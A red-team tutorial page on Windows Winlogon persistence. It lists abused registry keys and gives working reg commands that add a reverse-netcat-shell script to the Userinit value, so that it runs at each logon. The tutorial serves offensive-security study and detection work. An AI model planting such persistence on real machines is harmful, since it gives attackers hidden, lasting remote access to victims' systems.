> For the complete documentation index, see [llms.txt](https://www.ired.team/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://www.ired.team/offensive-security/persistence/windows-logon-helper.md).

# Windows Logon Helper

> Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.
>
> <https://attack.mitre.org/techniques/T1004/>

Commonly abused Winlogon registry keys and value for persistence are:

```
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify 
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\shell
```

{% hint style="info" %}
HKCU can also be replaced with HKLM for a system wide persistence, if you have admin privileges.
{% endhint %}

## Execution

Let's run through the techqnique abusing the `userinit` subkey.

Let's see what's currently held at the `userinit`:

```
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v userinit
```

![](/files/-LytPFFTkLOYF0XCvDwl)

Let's now add an additional item shell.cmd (a simple reverse netcat shell) to the list that we want to be launched when the compromised machine reboots:

```
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v userinit /d C:\Windows\system32\userinit.exe,C:\tools\shell.cmd /t reg_sz /f
```

![](/files/-LytPUJ2Czi6SdVqhNsp)

Rebooting the compromised system executes the c:\tools\shell.cmd, which in turn establishes a reverse shell to the attacking system:

![](/files/-LytPa1XD-Ek5oBepsrF)

## References

{% embed url="<https://attack.mitre.org/techniques/T1004/>" %}
